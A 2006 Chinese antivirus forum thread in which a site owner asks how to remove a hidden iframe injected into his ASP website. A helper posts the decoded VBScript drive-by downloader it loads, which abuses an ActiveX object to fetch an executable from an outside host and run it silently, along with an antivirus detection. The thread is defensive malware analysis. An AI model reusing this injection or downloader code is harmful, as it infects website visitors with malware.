瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【求助】请问这个是网页代码里的病毒,老杀不了,删除了又回来!!!!

1   1  /  1  页   跳转

【求助】请问这个是网页代码里的病毒,老杀不了,删除了又回来!!!!

收藏
3d4u
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2006-10-20
  • 来自:
发表于: 2006-10-20 23:12 | 只看楼主 短消息 资料
字号: 1楼

【求助】请问这个是网页代码里的病毒,老杀不了,删除了又回来!!!!

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
就是这个代码,要怎么删除或!我在我的网页代码里一一删除了这个代码,但是重新打开的时候,又回来了
!急救呀!
用瑞星也不能删除!
最后编辑2006-10-22 13:37:58
分享到:
gototop
 
轩辕小聪
头像
卡卡技术团队
  • 帖子:8368
  • 注册: 2006-01-09
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2006-10-20 23:15 | 短消息 资料
字号: 2楼

你的网页,指的是你自己的网站的网页,还是你的电脑里所保存的htm网页?
gototop
 
deadmanzj
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-07-24
  • 来自:
发表于: 2006-10-20 23:21 | 短消息 资料
字号: 3楼

on error resume next dl = "http://www.ac66.cn/88/pp.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0
You DO it!

还原出来后的代码是这样的

下载了一个http://www.ac66.cn/88/pp.exe这个东西,卡巴报
已删除: 病毒 Packed.Win32.PePatch.dk (修改)   
文件: C:\Documents and Settings\panwenshuai\Local Settings\Temporary Internet Files\Content.IE5\8TANKH6N\pp[1].exe/PE_Patch
gototop
 
3d4u
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2006-10-20
  • 来自:
发表于: 2006-10-22 13:45 | 只看楼主 短消息 资料
字号: 4楼

是我个人的ASP网站
gototop
 
3d4u
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2006-10-20
  • 来自:
发表于: 2006-10-22 13:46 | 只看楼主 短消息 资料
字号: 5楼

要怎么删除呀,各位老大呀!
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT